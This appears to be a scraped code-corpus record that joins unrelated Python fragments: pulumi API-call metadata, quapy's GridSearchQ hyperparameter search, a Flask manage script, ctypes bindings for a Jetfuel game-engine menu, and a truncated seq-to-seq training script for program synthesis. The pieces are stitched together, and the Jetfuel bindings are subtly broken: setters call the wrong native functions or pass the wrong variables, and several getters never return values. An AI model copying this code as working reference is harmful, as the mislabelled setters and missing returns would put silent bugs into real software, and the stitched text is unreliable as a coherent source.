((10872, 10910), 'pulumi.get', 'pulumi.get', (['self', '"""max_delivery_count"""'], {}), "(self, 'max_delivery_count')\n", (10882, 10910), False, 'import pulumi\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '"""message_count"""'], {}), "(self, 'message_count')\n", (11081, 11104), False, 'import pulumi\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (11237, 11251), False, 'import pulumi\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '"""requires_session"""'], {}), "(self, 'requires_session')\n", (11486, 11512), False, 'import pulumi\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '"""status"""'], {}), "(self, 'status')\n", (11712, 11728), False, 'import pulumi\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '"""system_data"""'], {}), "(self, 'system_data')\n", (11946, 11967), False, 'import pulumi\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (12100, 12114), False, 'import pulumi\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '"""updated_at"""'], {}), "(self, 'updated_at')\n", (12297, 12317), False, 'import pulumi\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (14721, 14723), False, 'import pulumi\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:servicebus/v20210601preview:getSubscription"""', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), "(\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\n opts=opts, typ=GetSubscriptionResult)\n", (14836, 14953), False, 'import pulumi\n')] |
import itertools
import signal
from copy import deepcopy
from typing import Union, Callable
import numpy as np
import quapy as qp
from quapy.data.base import LabelledCollection
from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction
from quapy.method.aggregative import BaseQuantifier
import inspect
from quapy.util import _check_sample_size
class GridSearchQ(BaseQuantifier):
"""Grid Search optimization targeting a quantification-oriented metric.
Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation
protocol for quantification.
:param model: the quantifier to optimize
:type model: BaseQuantifier
:param param_grid: a dictionary with keys the parameter names and values the list of values to explore
:param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen')
:param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence
protocol, or 'gen' for using a custom sampling generator function
:param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval
[0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for
each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. If not specified, then eval_budget is requested.
Ignored if protocol!='app'.
:param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored
for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be
generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions).
Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in
those cases).
:param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter
combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then
n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1],
[0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than
20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be
generated if the generator yields less samples.
:param error: an error function (callable) or a string indicating the name of an error function (valid ones
are those in qp.error.QUANTIFICATION_ERROR
:param refit: whether or not to refit the model on the whole labelled collection (training+validation) with
the best chosen hyperparameter combination. Ignored if protocol='gen'
:param val_split: either a LabelledCollection on which to test the performance of the different settings, or
a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable
returning a generator function each time it is invoked (only for protocol='gen').
:param n_jobs: number of parallel jobs
:param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'.
:param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested.
Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up
being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set.
:param verbose: set to True to get information through the stdout
"""
def __init__(self,
model: BaseQuantifier,
param_grid: dict,
sample_size: Union[int, None] = None,
protocol='app',
n_prevpoints: int = None,
n_repetitions: int = 1,
eval_budget: int = None,
error: Union[Callable, str] = qp.error.mae,
refit=True,
val_split=0.4,
n_jobs=1,
random_seed=42,
timeout=-1,
verbose=False):
self.model = model
self.param_grid = param_grid
self.sample_size = sample_size
self.protocol = protocol.lower()
self.n_prevpoints = n_prevpoints
self.n_repetitions = n_repetitions
self.eval_budget = eval_budget
self.refit = refit
self.val_split = val_split
self.n_jobs = n_jobs
self.random_seed = random_seed
self.timeout = timeout
self.verbose = verbose
self.__check_error(error)
assert self.protocol in {'app', 'npp', 'gen'}, \
'unknown protocol: valid ones are "app" or "npp" for the "artificial" or the "natural" prevalence ' \
'protocols. Use protocol="gen" when passing a generator function thorough val_split that yields a ' \
'sample (instances) and their prevalence (ndarray) at each iteration.'
assert self.eval_budget is None or isinstance(self.eval_budget, int)
if self.protocol in ['npp', 'gen']:
if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0):
raise ValueError(f'when protocol="npp" the parameter eval_budget should be '
f'indicated (and should be >0).')
if self.n_repetitions != 1:
print('[warning] n_repetitions has been set and will be ignored for the selected protocol')
def _sout(self, msg):
if self.verbose:
print(f'[{self.__class__.__name__}]: {msg}')
def __check_training_validation(self, training, validation):
if isinstance(validation, LabelledCollection):
return training, validation
elif isinstance(validation, float):
assert 0. < validation < 1., 'validation proportion should be in (0,1)'
training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed)
return training, validation
elif self.protocol=='gen' and inspect.isgenerator(validation()):
return training, validation
else:
raise ValueError(f'"validation" must either be a LabelledCollection or a float in (0,1) indicating the'
f'proportion of training documents to extract (type found: {type(validation)}). '
f'Optionally, "validation" can be a callable function returning a generator that yields '
f'the sample instances along with their true prevalence at each iteration by '
f'setting protocol="gen".')
def __check_error(self, error):
if error in qp.error.QUANTIFICATION_ERROR:
self.error = error
elif isinstance(error, str):
self.error = qp.error.from_name(error)
elif hasattr(error, '__call__'):
self.error = error
else:
raise ValueError(f'unexpected error type; must either be a callable function or a str representing\n'
f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}')
def __generate_predictions(self, model, val_split):
commons = {
'n_repetitions': self.n_repetitions,
'n_jobs': self.n_jobs,
'random_seed': self.random_seed,
'verbose': False
}
if self.protocol == 'app':
return artificial_prevalence_prediction(
model, val_split, self.sample_size,
n_prevpoints=self.n_prevpoints,
eval_budget=self.eval_budget,
**commons
)
elif self.protocol == 'npp':
return natural_prevalence_prediction(
model, val_split, self.sample_size,
**commons)
elif self.protocol == 'gen':
return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget)
else:
raise ValueError('unknown protocol')
def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None):
""" Learning routine. Fits methods with all combinations of hyperparameters and selects the one minimizing
the error metric.
:param training: the training set on which to optimize the hyperparameters
:param val_split: either a LabelledCollection on which to test the performance of the different settings, or
a float in [0,1] indicating the proportion of labelled data to extract from the training set
:return: self
"""
if val_split is None:
val_split = self.val_split
training, val_split = self.__check_training_validation(training, val_split)
if self.protocol != 'gen':
self.sample_size = _check_sample_size(self.sample_size)
params_keys = list(self.param_grid.keys())
params_values = list(self.param_grid.values())
model = self.model
if self.timeout > 0:
def handler(signum, frame):
self._sout('timeout reached')
raise TimeoutError()
signal.signal(signal.SIGALRM, handler)
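            # NOTE: the SIGALRM-based timeout only works on Unix and only when
            # fit() runs in the main thread; the alarm is re-armed for every
            # hyper-parameter configuration below and cleared once it finishes.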
self.param_scores_ = {}
self.best_score_ = None
some_timeouts = False
for values in itertools.product(*params_values):
params = dict({k: values[i] for i, k in enumerate(params_keys)})
if self.timeout > 0:
signal.alarm(self.timeout)
try:
# overrides default parameters with the parameters being explored at this iteration
model.set_params(**params)
model.fit(training)
true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split)
score = self.error(true_prevalences, estim_prevalences)
self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}')
if self.best_score_ is None or score < self.best_score_:
self.best_score_ = score
self.best_params_ = params
self.best_model_ = deepcopy(model)
self.param_scores_[str(params)] = score
if self.timeout > 0:
signal.alarm(0)
except TimeoutError:
print(f'timeout reached for config {params}')
some_timeouts = True
if self.best_score_ is None and some_timeouts:
raise TimeoutError('all jobs took more than the timeout time to end')
self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})')
if self.refit:
self._sout(f'refitting on the whole development set')
self.best_model_.fit(training + val_split)
return self
def quantify(self, instances):
"""Estimate class prevalence values using the best model found after calling the :meth:`fit` method.
        :param instances: sample containing the instances
:return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found
by the model selection process.
"""
assert hasattr(self, 'best_model_'), 'quantify called before fit'
return self.best_model().quantify(instances)
@property
def classes_(self):
"""
        Classes on which the quantifier has been trained.
:return: a ndarray of shape `(n_classes)` with the class identifiers
"""
return self.best_model().classes_
def set_params(self, **parameters):
"""Sets the hyper-parameters to explore.
:param parameters: a dictionary with keys the parameter names and values the list of values to explore
"""
self.param_grid = parameters
def get_params(self, deep=True):
"""Returns the dictionary of hyper-parameters to explore (`param_grid`)
:param deep: Unused
:return: the dictionary `param_grid`
"""
return self.param_grid
def best_model(self):
"""
Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination
of hyper-parameters that minimized the error function.
:return: a trained quantifier
"""
if hasattr(self, 'best_model_'):
return self.best_model_
raise ValueError('best_model called before fit')
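

# Illustrative usage sketch (not part of the original module). `my_quantifier`
# and the grid values are placeholders for any BaseQuantifier and its
# hyper-parameters:
#
#   param_grid = {'C': [0.1, 1.0, 10.0]}
#   grid = GridSearchQ(my_quantifier, param_grid, sample_size=500,
#                      protocol='app', eval_budget=100, error='mae',
#                      refit=True, val_split=0.4, verbose=True)
#   grid.fit(training_collection)
#   estim_prevalences = grid.quantify(test_instances)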
| [
"quapy.evaluation.natural_prevalence_prediction",
"signal.signal",
"util._check_sample_size",
"itertools.product",
"quapy.error.from_name",
"quapy.evaluation.artificial_prevalence_prediction",
"quapy.evaluation.gen_prevalence_prediction",
"signal.alarm",
"copy.deepcopy"
] | [((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\n', (9711, 9727), False, 'import itertools\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\n', (9218, 9236), False, 'from util import _check_sample_size\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\n', (9551, 9576), False, 'import signal\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\n', (7187, 7194), True, 'import quapy as qp\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\n', (9868, 9882), False, 'import signal\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\n )\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\n', (10570, 10577), False, 'from copy import deepcopy\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\n', (10704, 10707), False, 'import signal\n')] |
# -*- coding: utf-8 -*-
import os
from flask_migrate import Migrate
from app import create_app, db
from app.models import User, Role, PoseToLocation
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
migrate = Migrate(app, db)
# To generate new migrations, these model files must be imported here so they can be scanned.
@app.shell_context_processor
def make_shell_context():
return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation)
# Unit tests
@app.cli.command()
def test():
""" run the unit tests """
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
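
# Typical invocation (assuming FLASK_APP points at this module):
#   flask db upgrade   # apply database migrations
#   flask test         # run the unit test suite registered above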
| [
"unittest.TestLoader",
"flask_migrate.Migrate",
"unittest.TextTestRunner",
"os.getenv"
] | [((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\n', (227, 236), False, 'from flask_migrate import Migrate\n'), ((170, 195), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (179, 195), False, 'import os\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (524, 526), False, 'import unittest\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (572, 585), False, 'import unittest\n')] |
# Jetfuel Game Engine- A SDL-based 2D game-engine
# Copyright (C) 2018 InfernoStudios
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_uint
from ctypes import c_int
from ctypes import c_void_p
from ctypes import c_bool
from ctypes import c_wchar_p
from jetfuel.draw.rectangleinterface import rectangle_interface
from jetfuel.draw.image import image
class menu(rectangle_interface):
def __init__(self, jetfuelsoloader, maxheight=None, columngap=None,
buttongap=None):
self._jetfuel = jetfuelsoloader.jetfuelso;
if(maxheight is not None and columngap is not None and
buttongap is not None):
self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint,
c_uint,
c_uint];
self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p;
self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps(
maxheight,
columngap,
buttongap);
else:
self._jetfuel.Menu_new.restype = c_void_p;
self.drawableref = self._jetfuel.Menu_new();
print("Constructed empty drawableref!");
def get_max_height(self):
self._jetfuel.Menu_get_max_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_max_height.restype = c_uint;
return self._jetfuel.Menu_get_max_height(self.drawableref);
def set_max_height(self, maxheight):
self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];
self._jetfuel.Menu_set_max_height(self.drawableref, maxheight);
def get_column_gap(self):
self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p];
self._jetfuel.Menu_get_column_gap.restype = c_uint;
return self._jetfuel.Menu_get_column_gap(self.drawableref);
def set_column_gap(self, columngap):
self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint];
        self._jetfuel.Menu_set_column_gap(self.drawableref, columngap);
def get_button_gap(self):
self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p];
self._jetfuel.Menu_get_button_gap.restype = c_uint;
        return self._jetfuel.Menu_get_button_gap(self.drawableref);
def set_button_gap(self, buttongap):
self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];
self._jetfuel.Menu_set_max_height(self.drawableref, buttongap);
def get_container_box_image(self, jetfuelsoloader):
self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_image.restype = c_void_p;
containerboximage = image(jetfuelsoloader);
self._jetfuel.Image_delete.argtypes = [c_void_p];
self._jetfuel.Image_delete(containerboximage.imageref);
containerboximage.imageref = self._jetfuel.Menu_get_container_box_image(
self.drawableref);
return containerboximage;
def set_container_box_image(self, image, borderwidth, borderheight):
self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p,
c_void_p, c_uint,
c_uint];
        self._jetfuel.Menu_set_container_box_image(self.drawableref,
                                                    image.imageref, borderwidth,
                                                    borderheight);
def get_container_box_border_width(self):
self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_border_width.restype = c_uint;
return self._jetfuel.Menu_get_container_box_border_width(
self.drawableref);
def get_container_box_border_height(self):
self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_border_height.restype = c_uint;
return self._jetfuel.Menu_get_container_box_border_height(
self.drawableref);
def add_button(self, buttoncharsreplacement, uisactiontowatchfor,
messagetosenduponclick, messagebus):
self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p,
c_wchar_p, c_wchar_p,
c_void_p];
self._jetfuel.Menu_add_button.restype = c_bool;
return self._jetfuel.Menu_add_button(self.drawableref,
buttoncharsreplacement.buttoncharsref,
uisactiontowatchfor,
messagetosenduponclick,
messagebus.messagebusref);
def get_position_x(self):
self._jetfuel.Menu_get_position_x.argtypes = [c_void_p];
self._jetfuel.Menu_get_position_x.restype = c_int;
        return self._jetfuel.Menu_get_position_x(self.drawableref);
def get_position_y(self):
self._jetfuel.Menu_get_position_y.argtypes = [c_void_p];
self._jetfuel.Menu_get_position_y.restype = c_int;
        return self._jetfuel.Menu_get_position_y(self.drawableref);
def set_position(self, x, y):
self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int];
self._jetfuel.Menu_set_position(self.drawableref, x, y);
def get_rect_to_draw_width(self):
self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p];
self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int;
        return self._jetfuel.Menu_get_rect_to_draw_width(self.drawableref);
def get_rect_to_draw_height(self):
self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int;
        return self._jetfuel.Menu_get_rect_to_draw_height(self.drawableref);
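
# Rough usage sketch (illustrative only; `jetfuelso_loader`, `box_image`,
# `button_chars` and `bus` stand for objects created elsewhere with these
# bindings):
#   m = menu(jetfuelso_loader, maxheight=600, columngap=20, buttongap=10)
#   m.set_container_box_image(box_image, 5, 5)
#   m.add_button(button_chars, "mouse_click", "start_game", bus)
#   m.set_position(100, 100)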
| [
"jetfuel.draw.image.image"
] | [((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\n', (3596, 3613), False, 'from jetfuel.draw.image import image\n')] |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Train seq-to-seq model on random supervised training tasks."""
# pytype: disable=wrong-arg-count
# pytype: disable=attribute-error
import collections
import functools
import json
import os
import random
import sys
import time
from absl import app
from absl import flags
from absl import logging
from flax import jax_utils
from flax import linen as nn
from flax import optim
from flax.metrics import tensorboard
from flax.training import checkpoints
from flax.training import common_utils
import jax
import jax.numpy as jnp
import numpy as np
import tensorflow.compat.v2 as tf
from latent_programmer import decode
from latent_programmer import models as base_models
from latent_programmer.decomposition_transformer_attention import decomposition_models as models
from latent_programmer.decomposition_transformer_attention import input_pipeline
from latent_programmer.tasks.robust_fill import dsl
from latent_programmer.tasks.robust_fill import tokens as dsl_tokens
sys.path.append('../../')
gfile = tf.io.gfile
FLAGS = flags.FLAGS
flags.DEFINE_integer('seed', 0, 'Fixed random seed for training.')
flags.DEFINE_float('lr', 1e-3, 'Learning rate.')
flags.DEFINE_float('weight_decay', 1e-1,
'Decay factor for AdamW-style weight decay.')
flags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.')
flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.')
flags.DEFINE_integer('num_heads', 4, 'Number of attention heads.')
flags.DEFINE_integer('num_layers', 3, 'Number of Transformer layers.')
flags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?')
flags.DEFINE_string('dataset_filepattern', None,
'Filepattern for TFRecord dataset.')
flags.DEFINE_integer('per_device_batch_size', 16,
'Number of program tasks in a batch.')
flags.DEFINE_integer('num_strings_per_task', 4,
'Number of input/output strings per task.')
flags.DEFINE_integer('max_program_length', 100,
'Maximum number of tokens in program.')
flags.DEFINE_integer('max_characters', 120,
'Maximum number of characters in input/output strings.')
flags.DEFINE_string('save_dir', None, 'Directory to save results to.')
flags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.')
flags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.')
flags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.')
flags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.')
flags.DEFINE_integer('predict_freq', 50000,
'Number of steps between prediction (beam search).')
flags.DEFINE_integer('checkpoint_freq', 50000,
'Number of steps between checkpoint saves.')
flags.DEFINE_integer('finetune_start_step', -1,
'Step the initial checkpoint should start at for '
'finetuning, or -1 if not finetuning.')
flags.DEFINE_bool('restore_checkpoints', True,
'Whether to restore from existing model checkpoints.')
flags.DEFINE_string('attention_mask_type', 'bos_full_attention',
'The kind of attention mask to use. Options are: baseline, '
'bos_to_bos, bos_full_attention')
flags.DEFINE_bool('use_relative_attention', True,
                  'Whether to use relative positional embeddings.')
flags.DEFINE_bool('bos_special_attention', False,
'Whether to use special relative attention computation for '
'BOS tokens.')
_internal = False
if not _internal:
flags.DEFINE_string('xm_parameters', None,
                      'String specifying hyperparameter search.')
def create_learning_rate_scheduler(
base_learning_rate=0.5,
factors='constant * linear_warmup * rsqrt_normalized_decay',
warmup_steps=16000,
decay_factor=0.5,
steps_per_decay=50000,
steps_per_cycle=100000):
"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
base_learning_rate: float, the starting constant for the lr schedule.
factors: a string with factors separated by '*' that defines the schedule.
warmup_steps: how many steps to warm up for in the warmup schedule.
decay_factor: The amount to decay the learning rate by.
steps_per_decay: How often to decay the learning rate.
steps_per_cycle: Steps per cycle when using cosine decay.
Returns:
A function learning_rate(step): float -> {'learning_rate': float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
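# Editor's note: a minimal usage sketch (the values are illustrative
# assumptions, not from the original code). The factors string multiplies the
# listed terms, so a warmup-then-constant schedule can be expressed as:
#
#     lr_fn = create_learning_rate_scheduler(
#         base_learning_rate=1e-3,
#         factors='constant * linear_warmup',
#         warmup_steps=1000)
#     lr_fn(500)   # -> 5e-4, halfway through warmup
#     lr_fn(2000)  # -> 1e-3, warmup finished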
def compute_weighted_cross_entropy(logits, targets, weights=None):
"""Compute weighted cross entropy and entropy for log probs and targets.
Args:
logits: `[batch, length, num_classes]` float array.
targets: categorical targets `[batch, length]` int array.
weights: None or array of shape [batch, length, 1]
Returns:
Tuple of scalar loss and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
onehot_targets = common_utils.onehot(targets, logits.shape[-1])
loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)
normalizing_factor = jnp.prod(jnp.asarray(targets.shape))
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
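# Editor's note: callers in this file (see train_step below) build weights from
# jnp.where(programs > 0, 1, 0), so padded positions contribute neither to the
# summed loss nor to the normalizing factor returned here.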
def compute_weighted_accuracy(logits, targets, weights=None):
"""Compute weighted accuracy for log probs and targets.
Args:
logits: `[batch, length, num_classes]` float array.
targets: categorical targets `[batch, length]` int array.
weights: None or array of shape [batch, length, 1]
Returns:
Tuple of scalar accuracy and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
acc = jnp.equal(jnp.argmax(logits, axis=-1), targets)
normalizing_factor = jnp.prod(jnp.asarray(targets.shape))
if weights is not None:
acc = acc * weights
normalizing_factor = weights.sum()
return acc.sum(), normalizing_factor
def compute_metrics(logits, targets, weights):
"""Compute summary metrics."""
loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)
acc, _ = compute_weighted_accuracy(logits, targets, weights)
metrics = {
'loss': loss,
'accuracy': acc,
'denominator': weight_sum,
}
metrics = jax.lax.psum(metrics, 'batch')
return metrics
# Train / eval / decode step functions.
# -----------------------------------------------------------------------------
def train_step(optimizer,
inputs,
outputs,
programs,
learning_rate_fn,
config,
dropout_rng):
"""Train on batch of program tasks."""
# We handle PRNG splitting inside the top pmap, rather
# than handling it outside in the training loop - doing the
# latter can add some stalls to the devices.
dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)
weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32)
def loss_fn(params):
"""Loss function used for training."""
logits = models.DecomposeAttentionTransformer(config).apply(
{'params': params},
inputs,
outputs,
programs,
rngs={'dropout': dropout_rng})
loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights)
mean_loss = loss / weight_sum
return mean_loss, logits
step = optimizer.state.step
lr = learning_rate_fn(step)
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(_, logits), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)
# Get metrics.
metrics = compute_metrics(logits, programs, weights)
metrics['learning_rate'] = lr
return new_optimizer, metrics, new_dropout_rng
def eval_step(params, inputs, outputs, programs, eos_token, config):
"""Collect metrics for evaluation during training."""
weights = jnp.where(
jnp.logical_and(programs > 0,
jnp.logical_and(programs != config.base_config.bos_token,
programs != eos_token)),
1, 0).astype(jnp.float32)
logits = models.DecomposeAttentionTransformer(config).apply(
{'params': params}, inputs, outputs, programs)
return compute_metrics(logits, programs, weights)
def initialize_cache(inputs, outputs, programs, max_decode_len, config):
"""Initialize a cache for a given input shape and max decode length."""
target_shape = (programs.shape[0], max_decode_len)
dtype = config.base_config.dtype
initial_variables = models.DecomposeAttentionTransformer(config).init(
jax.random.PRNGKey(0),
jnp.ones(inputs.shape, dtype),
jnp.ones(outputs.shape, dtype),
jnp.ones(target_shape, dtype))
return initial_variables['cache']
def predict_step(params,
inputs,
outputs,
cache,
beam_size,
eos_token,
max_decode_len,
config,
slow_decode=True):
"""Predict translation with fast decoding beam search on a batch."""
# Prepare transformer fast-decoder call for beam search: for beam search, we
# need to set up our decoder model to handle a batch size equal to
# batch_size * beam_size, where each batch item's data is expanded in-place
# rather than tiled.
flat_encoded = decode.flat_batch_beam_expand(
models.DecomposeAttentionTransformer(config).apply(
{'params': params},
inputs,
outputs,
method=models.DecomposeAttentionTransformer.encode),
beam_size)
encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32)
flat_encoded_padding_mask = decode.flat_batch_beam_expand(
encoded_padding_mask, beam_size)
if slow_decode:
def tokens_ids_to_logits(flat_ids):
"""Token slice to logits from decoder model."""
# --> [batch * beam, 1, vocab]
flat_logits = models.DecomposeAttentionTransformer(config=config).apply(
{'params': params},
flat_ids,
flat_encoded,
flat_encoded_padding_mask,
method=models.DecomposeAttentionTransformer.decode)
return flat_logits
else:
def tokens_ids_to_logits(flat_ids, flat_cache):
"""Token slice to logits from decoder model."""
# --> [batch * beam, 1, vocab]
flat_logits, new_vars = models.DecomposeAttentionTransformer(
config=config).apply(
{'params': params, 'cache': flat_cache},
flat_ids,
flat_encoded,
flat_encoded_padding_mask,
mutable=['cache'],
